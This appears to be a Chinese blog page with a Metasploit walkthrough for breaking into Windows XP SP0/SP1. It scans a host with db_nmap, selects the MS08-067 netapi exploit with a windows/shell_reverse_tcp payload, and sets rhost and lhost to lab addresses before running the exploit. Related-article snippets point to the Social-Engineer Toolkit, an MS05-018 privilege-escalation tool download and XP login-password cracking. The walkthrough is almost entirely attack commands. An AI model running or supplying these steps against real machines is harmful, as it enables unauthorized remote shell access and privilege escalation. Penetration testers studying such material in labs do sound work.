入侵(适用于windows xp sp0 sp1,只看思路) 类似 armitage

[email protected]:~# msfconsole

msf > workspace

msf > db_status

msf > workspace -a testlab

msf > db_nmap -T4 -A 192.168.1.78

msf > hosts

msf > services

msf exploit(ms06_040_netapi) > searchnetapi

Matching Modules

================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

exploit/windows/smb/ms03_049_netapi 2003-11-11 good MS03-049 Microsoft Workstation ServiceNetAddAlternateComputerName Overflow

exploit/windows/smb/ms06_040_netapi 2006-08-08 good MS06-040 Microsoft Server Service NetpwPathCanonicalizeOverflow

exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual MS06-070 Microsoft Workstation ServiceNetpManageIPCConnect Overflow

exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service RelativePath Stack Corruption

msf > useexploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > showpayloads

msf exploit(ms08_067_netapi) > setpayload windows/shell_reverse_tcp

payload => windows/shell_reverse_tcp

msf exploit(ms08_067_netapi) > showoptions

msf exploit(ms08_067_netapi) > set rhost192.168.1.78

rhost => 192.168.1.78

msf exploit(ms08_067_netapi) > set lhost192.168.1.242

lhost => 192.168.1.242

msf exploit(ms08_067_netapi) > showoptions

msf exploit(ms08_067_netapi) > exploit (成功登陆)

时间： 2025-01-03 20:30:34

入侵(适用于windows xp sp0 sp1,只看思路) 类似 armitage的相关文章

网页入侵(适用于windows xp,只看思路)

[email protected]:~# setoolkit Do you agree to the terms of service [y/n]:y Select from the menu: 1)Social-Engineering Attacks 2)Penetration Testing (Fast-Track) 3)Third Party Modules 4)Update the Social-Engineer Toolkit 5)Update SET configuration 6)

使用Nessus扫描Windows XP SP1之360安全软件

使用Nessus扫描Windows XP SP1之360安全软件在Windows操作系统中,用户都认为360是一款非常强大的安全软件.可以用来保护计算机不被病毒侵入,病毒文件的拦截等.但是,到底这款软件有多么强大,或者可能就是一款普通的安全软件.为了验证360这款软件到底是否强大,这里使用Nessus对Windows XP SP1操作系统,而且安装了360安全软件实施扫描.通过分析报告,看安装360与不安装是否有很大的差别,可否拦截Nessus扫描.下面是使用Nessus中Network Sc

渗透杂记-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

Welcome to the Metasploit Web Console! | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | ( | | | _| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| _| =[ metasploit v3.4.2-dev [core:3.4 api:1.0] + -- --=[ 566 exploits - 283

适用于kali linux的远程桌面开启方法(从windows xp 远程登录到kali linux )

为了解决Windows远程桌面访问Ubuntu 12.04 之一中提到的VNC远程桌面的缺点(见http://www.linuxidc.com/Linux/2012-07/64801.htm),我们采用第二种方法XRDP,该方法支持多用户登录并远程桌面. 1.首先参考Windows远程桌面访问Ubuntu 12.04 之安装VNC中提到的安装GNOME桌面方法(点击这里): 2.进入GNOME界面,在左上角进入系统->首选项->桌面共享进行如下设置. 我们共享所使用的协议是rdp,所以我们要

Windows XP SP1 Privilege Escalation

MS05-018 MS05-018 Works for Windows 2K SP3/4 | Windows XP SP1/2 Download ms05-018.exe: https://github.com/xiaoxiaoleo/windows_pentest_tools/tree/master/%E6%8F%90%E6%9D%83%E5%B7%A5%E5%85%B7/windows%E6%8F%90%E6%9D%83%E5%B7%A5%E5%85%B7/MS05018%E2%80%94C

有关WINDOWS XP登录密码的几种方法

网上关于破解WINDOWS XP登录密码的几种方法很多,但许多根本不行.我现在总结自己试过几种,这几种方法其实均比较菜的,但可行的.WINDOWS XP登录是由SAM 文件管理的,总体来说“山姆大叔”是比较难搞定的,所以网上许多方法不行的原因吧.上次在网上看到关于一篇关于SAM 文件的文章,写得不错,但没能收藏起来.反正有不少人在研究这个.我想就是有了破解的方法,高手们也不一定全公布吧,这是由于大家不难知道的原因——安全,他们不便公布!如果很轻易就破了的话,那微软一定要打这个补丁的,那他们的成果

[Eage、Eage S系列] 预装Win 8的机型更换Win7及Windows XP如何设置

本文档讲解预装Windows8 机型更换低版本操作系统的修改方法,由于ThinkPad电脑随机不带Windows 8恢复光盘,如果您仍想保留预装的正版Windows 8系统,请在更换系统之前创建恢复介质提前保留,创建方法见<创建恢复介质方法> 温馨提示:尊敬的联想用户,为了预防计算机数据意外丢失风险,建议您定期备份您的重要数据到第三方存储介质(如服务器.光盘.移动存储设备等),以确保您的数据安全. 操作方法: 1. 开机过程中点击F1进入到BIOS界面: 2. 进入Security---Sec

Windows XP运行命令

运行程序&运行命令辅助功效选项access.cpl添加硬件向导hdwwiz.cpl添加或者删除程序appwiz.cpl管理工具control admintools自动更新w pl.cpl Bltooth文件传送向导fsquirt计算器calc证书管理节制台certmgr.msc字符照射表charmap磁盘查抄工具chkdsk剪贴簿查看器clipbrd命令行提示符cmd组件服务dcomcnfg计算机管理compmgmt.msc日期和时间属性timedate.cpl DDE同享ddeshare装备管

在32位PC机上实现Windows XP和CentOS 6.4双系统

昨晚成功地实现了Windows XP和CentOS 6.4双系统,第一次在实际硬件上运行了CentOS. 其实网络上很多教程都说得很清楚了,我在这里把自己的经验和关键点写一下. 我也是用U盘的方式来安装的CentOS,在这之前,电脑上已经有了XP系统,主分区有一个,15G,就是XP的,扩展分区里逻辑分区若干,专门为/和/home还有/swap预留了三个逻辑分区,分别为15G,20G和2G. U盘是8G,FAT32格式.电脑BIOS修改启动方式之类的相信大家都懂的. 1.网上有篇帖子说用Ultra